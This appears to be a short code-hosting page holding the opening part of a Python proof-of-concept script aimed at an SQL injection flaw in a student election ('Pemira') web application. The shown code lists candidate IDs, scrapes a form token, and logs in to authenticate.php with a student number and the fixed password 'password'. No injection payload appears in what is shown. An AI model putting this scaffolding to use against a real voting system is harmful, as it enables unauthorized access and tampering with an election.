PoC for Pemira Development Application SQLi Vulnerability
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 

30 lines
549 B

import requests
from HTMLParser import HTMLParser
ID_BALMA = [
'5rZy46Pm',
'BVmJxh6E'
]
ID_SEMA = [
'JLamqe5q',
'jP5sqhCQ',
'W8jdVp4J'
]
class PemiraParser(HTMLParser):
TOKEN = ''
def handle_starttag(self, tag, attrs):
if tag == 'input':
if attrs[1][1] == 'token_':
self.TOKEN = attrs[2][1]
def login(conn, host, nim):
var = conn.post("http://%s/authenticate.php" % host, data={
"nim": nim,
"pass": "password",
"formSubmit": "Login"})
return var